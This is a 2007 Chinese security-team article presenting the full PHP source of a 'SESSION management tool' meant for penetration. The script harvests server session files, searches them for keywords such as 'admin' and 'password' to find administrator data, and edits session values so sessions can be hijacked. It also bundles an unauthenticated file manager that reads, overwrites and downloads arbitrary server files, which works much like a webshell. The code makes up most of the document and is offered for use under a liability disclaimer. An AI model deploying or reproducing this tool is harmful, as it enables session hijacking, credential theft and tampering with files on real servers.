快捷導(dǎo)航

PHP服務(wù)端SESSION管理工具提供下載

更新時(shí)間：2007年10月09日 15:20:40 作者：

文章作者：Inking
信息來(lái)源：邪惡八進(jìn)制信息安全團(tuán)隊(duì)（www.eviloctal.com）

前兩天我所在的樓層斷了網(wǎng),郁悶的我什么也干不了.之前剛好看到劍心的blog里有篇瘋狗寫(xiě)的關(guān)于利用session滲透的文章,文章寫(xiě)得很簡(jiǎn)單,到最后" 小氣"的瘋狗也沒(méi)有把利用程序發(fā)出來(lái),所以我不管有沒(méi)有用先把它寫(xiě)下來(lái)了.由于不能查資料,所以只好對(duì)這手冊(cè)看,代碼在很多方面可能還存在著缺陷.最煩人的還是正則和文件流操作的問(wèn)題,循環(huán)來(lái)循環(huán)去的,把我的頭都搞暈了,光是調(diào)試都花了整整一天的時(shí)間(寫(xiě)代碼粗心大意沒(méi)辦法).希望大家多提提意見(jiàn)看法.. 瘋狗的章:http://www.loveshell.net/blog/blogview.asp?logID=101

寫(xiě)好后我對(duì)程序的執(zhí)行效率進(jìn)行了大致的測(cè)試
執(zhí)行環(huán)境:winxp,PHP5,apache2,酷睿2050--1.6GHZ,512m內(nèi)存,945主板
文件系統(tǒng):6層目錄,每層1000個(gè)文件,session文件大約為50-100字節(jié)
搜索這6000個(gè)文件大約需10-15s的執(zhí)行時(shí)間,效率并不像我想象中的那么低.

復(fù)制代碼代碼如下:

<? 
if(isset($_GET['download'])){ 
    $filename=$_GET['filename']; 
    $dirname=$_GET['dirname']; 
    ob_start(); 
    download($dirname,$filename); 
    flush; 
} 
session_start(); 
$default=ini_get('session.save_path'); 
$thispath=str_replace("\\","/",__FILE__); 
$thispath=substr($thispath,0,strrpos($thispath,"/")); 
?> 
<html> 
<head> 
<title>SESSION管理工具</title> 
<head> 
<style> 
body{ 
    margin:0; 
    padding:0; 
    background:#000000; 
    color:green; 
    margin-top=60px; 
    FONT-FAMILY: verdana; 
    FONT-SIZE: 10px; 
} 
input{ 
    margin:0px; 
    padding:0px; 
    color:green; 
    border: 1px; 
    border-bottom-color:#ffffff; 
} 
hr{ 
    width:85%; 
    height:1px; 
} 
</style> 
</head> 
<body><center><h3>PHP服務(wù)端SESSION管理工具</h3><p><a href=<? echo $_SESSION['PHP_SELF'];?>?help=yes>(使用方法)</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="<? echo $_SESSION['PHP_SELF'];?>?fcontrol=yes&dirname=<? echo $thispath;?>">(文件操作)</a></p> 
<hr> 
<p>&nbsp;</p> 
<table border=1 bordercolorlight="000000" bordercolordark="000000"> 
<form action=<? echo $_SERVER['PHP_SELF'];?> method=GET> 
<tr><td><b>&nbsp;&nbsp;&nbsp;&nbsp;SESSION路徑&nbsp;</b><input type=text name=spath value="<? echo $default;?>">&nbsp;</td></tr> 
<tr><td><input type="radio" checked name="fetch" value=searchone onclick="sessname.disabled=false;"><b>搜索指定SESSION</b> 
<input type=text name=sessname>&nbsp;&nbsp; 
<tr><td><input type="radio" name="fetch" value=all onclick="sessname.disabled=true;"><b>讀取所有SESSION</b> 
<input type=submit value=讀取>&nbsp;&nbsp;&nbsp;<input type=reset value=重置></td></tr></form></table><p></p> 
<table border=1 bordercolorlight="000000" bordercolordark="000000"> 
<? 
set_time_limit(0); 
if(PHP_VERSION < '4.1.0') { 
    $_POST = &$HTTP_POST_VARS; 
    $_GET = &$HTTP_GET_VARS; 
} 
$spath=$_GET['spath']; 
if(isset($_GET['fetch'])){//關(guān)鍵詞搜索 
    if(isset($_GET['fetch']['searchon'])&&isset($_GET['sessname'])&&$type="1"){ 
        !empty($_GET['sessname']) or die("<tr><td><font color=#B3614D>請(qǐng)輸入搜索關(guān)鍵字</font></td></tr>"); 
        $sessname=$_GET['sessname']; 
        getfname($spath); 
        count($session)>0 or die("<tr><td><font color=#B3614D>內(nèi)容為空,請(qǐng)檢查目錄的正確性或者修改關(guān)鍵字</font></td></tr>"); 
        foreach($session as $fpath=>$sessinfo){ 
            foreach($sessinfo as $sessid=>$contents){ 
                echo "<tr><p><td><a href=?modfname=".$fpath."&modname=".$sessid."&modify=1>SID:&nbsp;".$sessid."</a></td></p></tr>"; 
                foreach($contents as $name=>$value) 
                    echo "<tr><td><p>".$name."=>".$value."</p></td></tr>"; 
            } 
        } 
    } 
    elseif(isset($_GET['fetch']['all'])){//查找全部 
        $type=0; 
        getfname($spath); 
        count($session)>0 or die("<tr><td><font color=#B3614D>內(nèi)容為空,請(qǐng)檢查目錄的正確性</font></td></tr>"); 
        foreach($session as $fpath=>$sessinfo){ 
            foreach($sessinfo as $sessid=>$contents){ 
                echo "<tr><p><td><a href=?modfname=".$fpath."&modname=".$sessid."&modify=1>SID:&nbsp;".$sessid."</a></td></p></tr>"; 
                foreach($contents as $name=>$value) 
                    echo "<tr><td><p>".$name."=>".$value."</p></td></tr>"; 
            } 
        } 
    } 
    echo "</center></table>"; 
} 
if(isset($_GET['modify'])){//顯示某個(gè)文件下的內(nèi)容 
    $modify=$_GET['modify']; 
    $fpath=$_GET['modfname']; 
    $sid=$_GET['modname']; 
    getvalue($fpath,'1',''); 
    echo "<tr><td>你所修改的session文件的路徑:&nbsp;<p>".$fpath."</p></td></tr>"; 
    echo "<form action=".$_SERVER['PHP_SELF']." method=post>"; 
    echo "<input type=hidden value=".$fpath." name=m_path>"; 
    !empty($modsession) or die("<tr><td><font color=#B3614D>內(nèi)容為空,請(qǐng)檢查目錄的正確性</font></td></tr>"); 
    foreach($modsession as $modsessinfo){ 
            foreach($modsessinfo as $modsessid=>$contents){ 
                echo "<tr><p><td>SESSION_ID&nbsp;<input type=text name=m_sid value=".$modsessid.">&nbsp;&nbsp;</td></p></tr>"; 
                $i=0; 
                foreach($contents as $modname=>$modvalue){ 
                    echo "<tr><td><p>".$modname."&nbsp;=>&nbsp;<input type=text name=m_value[".$i++."] value=".$modvalue."></p></td></tr>"; 
                } 
            } 
    } 
    echo "<tr><td><input type=submit value=確認(rèn)修改>&nbsp;&nbsp;或<a href=".$_SERVER['PHP_SELF']."?modify_all=yes&modfname=".urlencode($fpath).">打開(kāi)文件</a>進(jìn)行完全編輯<a href=\"javascript:history.go(-1);\">或返回修改其它</a></td></tr></form></center></table>"; 
} 
if(isset($_POST['m_path'])){//對(duì)單個(gè)值進(jìn)行修改 
    $m_path=$_POST['m_path']; 
    $m_value=$_POST[m_value]; 
    $f=fopen($m_path,'r'); 
    $content=fgets($f,1024); 
    $explode=explode(";",$content); 
    fclose($f); 
    $f=fopen($m_path,'w'); 
    $m_content=''; 
    for($i=0;$i<count($m_value);$i++){ 
        $modified=ereg_replace("\".*\"",'"'.$m_value[$i].'"',$explode[$i]); 
        $m_content.=$modified.";"; 
    } 
    fwrite($f,$m_content); 
    fclose($f); 
    echo "<tr><td>修改成功,<a href=".$_SERVER['HTTP_REFERER'].">返回重新修改該session文件</a></td></tr></center></table>"; 
} 
if(isset($_GET['modify_all'])){//顯示要修改的文件的內(nèi)容 
    $filepath=$_GET['modfname']; 
    $f=fopen($filepath,"r"); 
    $fcontent=fread($f,filesize($filepath)); 
    echo "<tr><td>你正修改的文件是".$filepath; 
    echo "<form action=".$_SERVER['PHP_SELF']." method=post>"; 
    echo "<input type=hidden name=filepath value=".$filepath.">"; 
    echo "<center><textarea cols=100 rows=15 name=m_content>".$fcontent."</textarea></center>"; 
    echo "<p><input type=submit value=確認(rèn)修改>&nbsp;&nbsp;&nbsp;&nbsp;<a href=\"javascript:history.go(-1);\">返回上一步</a></form></p></td></tr></center></table>"; 
    fclose($f); 
} 
if(isset($_POST['m_content'])){//進(jìn)行完全修改 
    $m_content=$_POST['m_content']; 
    $filepath=$_POST['filepath']; 
    if(get_magic_quotes_gpc()) $m_content=stripslashes($m_content); 
    $f=fopen($filepath,"w"); 
    fwrite($f,$m_content); 
    fclose($f); 
    echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?modify_all=yes&modfname=".urlencode($filepath).">點(diǎn)這里查看或重新修改</a></td></tr>"; 
    echo "<tr><td><a href=".$_SERVER['PHP_SELF'].">返回首頁(yè)</a></td></tr></center></table>"; 
} 
if(isset($_GET['help'])){//顯示help 
    print<<<eof 
    <tr><td>本程序的功能是從指定的文件夾下讀取本文件夾及其子文件夾下的所有session文件的值,或者搜索含有指定關(guān)鍵字的session文件,不過(guò)注意由于寫(xiě)得很粗略,沒(méi)有用到數(shù)據(jù)庫(kù)功能,所以不支持多個(gè)關(guān)鍵字搜索,請(qǐng)搜索類似"admin","pwd","user","password"等可能含有管理員信息的關(guān)鍵字.<br>如果服務(wù)器的訪問(wèn)量大,勢(shì)必會(huì)產(chǎn)生很多session文件,最好用關(guān)鍵字的方法,并耐心等待,因?yàn)樵摮绦蛞粋€(gè)個(gè)的讀取session文件,并進(jìn)行匹配,效率之低可想而知.<br>由于這個(gè)程序就是為了從眾多session文件中查找相關(guān)內(nèi)容而設(shè)計(jì)的,所以并沒(méi)有添加直接修改指定session文件的功能,而只是對(duì)搜索出來(lái)的session文件進(jìn)行編輯.如果需要,請(qǐng)用記事本打開(kāi)session文件進(jìn)行編輯.你也可以提交如下url進(jìn)行編輯:"http://test.com/session.php?modfname=<session文件的路徑>&modname=<session_id>&modify=1".<br>在session路徑的填寫(xiě)框中盡量用"/"來(lái)代替"\",windows的seesion文件默認(rèn)保存路徑為"c:/windows/temp",linux下為"/tmp",不過(guò)程序會(huì)自動(dòng)幫你讀出當(dāng)前session所在的路徑,如果需要讀取其它的session請(qǐng)自行查找,并手動(dòng)填入.如果知道你所需要的session文件的具體文件夾,最好具體指明,這樣可以省時(shí)一些.點(diǎn)"讀取"后會(huì)顯示出搜索結(jié)果,以"session_name=>value"的形式顯示你所搜索到的結(jié)果,點(diǎn)擊對(duì)應(yīng)的session_id進(jìn)入編輯狀態(tài),點(diǎn)擊"確定修改"進(jìn)行相關(guān)內(nèi)容的修改,或者點(diǎn)"打開(kāi)文件"進(jìn)行完全編輯,然后確認(rèn)保存.<br>如果目錄填寫(xiě)不正確或者目錄中的session文件都為空,那么程序會(huì)報(bào)錯(cuò)"目錄中無(wú)session文件",這個(gè)時(shí)候請(qǐng)仔細(xì)檢查.<br>程序做好后一直因?yàn)榫W(wǎng)絡(luò)沒(méi)有恢復(fù),所以我又添加了個(gè)簡(jiǎn)單的文件操作功能,方便使用吧<br>因?yàn)槲易约簩?duì)正則不是很熟悉,對(duì)session的工作原理可能也了解的不是很透徹,前前后后花了兩天的時(shí)間才寫(xiě)好,光調(diào)試就花了我大半的時(shí)間,所以bug難免,尤其在正則匹配方面,歡迎到我的博客交流.<br>作這個(gè)程序的靈感來(lái)自瘋狗的兩篇文章,請(qǐng)參閱:http://www.loveshell.net/blog/blogview.asp?logID=101<br>具體使用時(shí)請(qǐng)自行刪除本幫助文檔,本程序歸Inking所有,僅供交流,一切使用上造成的后果于作者無(wú)關(guān).</td></tr></center></table> 
eof; 
} 
if(isset($_GET['fcontrol'])){ 
    $dirname=$_GET['dirname']; 
    if($dirname[strlen($dirname)-1]!="\\"&&$dirname[strlen($dirname)-1]!="/") $dirname.="/"; 
    echo "<tr><td>當(dāng)前文件路徑:&nbsp;".$dirname."</td></tr>"; 
    $opendir=opendir($dirname) or die("<tr><td><font color=#B3614D>打開(kāi)文件失敗</font></td></tr>"); 
    while($file=readdir($opendir)){ 
        if($file=="."){ 
            echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?fcontrol=yes&dirname=".urlencode($dirname).">".$file."</a></td></tr>"; 
            continue; 
        } 
        elseif($file==".."){ 
            $newname=substr($dirname,0,strrpos($dirname,"/")); 
            $newname=substr($newname,0,strrpos($newname,"/")+1); 
            echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?fcontrol=yes&dirname=".urlencode($newname).">".$file."</a></td></tr>"; 
        } 
        elseif(is_dir($dirname.$file."/")){ 
            echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?fcontrol=yes&dirname=".urlencode($dirname.$file)."/>".$file."</a></td></tr>"; 
        } 
        elseif(getftype($file)){ 
            echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?modify_all=yes&modfname=".urlencode($dirname.$file).">".$file."</a></td></tr>"; 
        } 
        else{ 
            echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?download=yes&filename=".urlencode($file)."&dirname=".urlencode($dirname).">".$file."</a></td></tr>"; 
        } 
    } 
} 
function getfname($spath){//遍歷目錄,并調(diào)用getvalue()函數(shù)得到各個(gè)session_name的值 
    global $fpath,$file; 
    if($spath[strlen($spath)-1]!="\\"&&$spath[strlen($spath)-1]!="/") $spath.="/"; 
    $opendir=opendir($spath) or die("<tr><td><font color=#B3614D>打開(kāi)文件失敗</font></td></tr>"); 
    while($file=readdir($opendir)){ 
        if($file=="."||$file=="..") continue; 
        if(is_dir($spath.$file."/")){ 
            getfname($spath.$file."/"); 
        } 
        elseif(ereg("^sess_",$file)){ 
            $fpath=$spath.$file; 
            preg_match('/(^sess_)(.+)+/',$file,$prex); 
            $file=$prex[2]; 
            getvalue($fpath,'0',$type); 
        } 
    } 
    closedir($opendir); 
} 
function getvalue($fpath,$modify='0',$type){//得到某個(gè)session文件中的session變量的值 
    global $type,$fpath,$sessname,$session,$file,$modsession,$sid; 
    $f=fopen($fpath,"a+"); 
    $content=fgets($f,1024); 
    fclose($f); 
    $explode=explode(";",$content); 
    $i=0; 
    while($match=$explode[$i++]){ 
        preg_match('/(^[^\|]*)+\|.+\"(.+)+\"$/',$match,$value); 
        $sname=$value[1]; 
        $svalue=$value[2]; 
        if($modify==1){ 
            $modsession[$fpath][$sid][$sname]=$svalue; 
            continue; 
        } 
        if($type){ 
            if(eregi($sessname,$sname)==true){ 
                $session[$fpath][$file][$sname]=$svalue; 
            } 
        } 
        else{ 
            $session[$fpath][$file][$sname]=$svalue; 
        } 
    } 
} 
function getftype($filename){//判斷文件類型 
    $ftype=substr($filename,strrpos($filename,".")+1); 
    switch($ftype){ 
        case "txt": 
            return true; 
        case "asp": 
            return true; 
        case "php": 
            return true; 
        case "ini": 
            return true; 
        case "log": 
            return true; 
        default: 
            return false; 
    } 
} 
function download($dirname,$filename){ 
    $f=fopen($dirname.$filename,"r"); 
    $contents=fread($f,filesize($dirname.$filename)); 
    fclose($f); 
    Header("Content-type: application/octet-stream"); 
    Header("Accept-Ranges: bytes"); 
    Header("Accept-Length: ".filesize($dirname.$filename)); 
    Header("Content-Disposition: attachment; filename=".$filename); 
    echo $contents; 
} 
?> 
</table> 
<p>&nbsp;</p> 
<hr> 
<center><p>Code By Inking&nbsp;&nbsp;&nbsp;<a >The Entry To My Website</a>&nbsp;&nbsp;&nbsp;QQ: 165068585</p><p>&nbsp;</p> 
</center> 
</body> 
</html>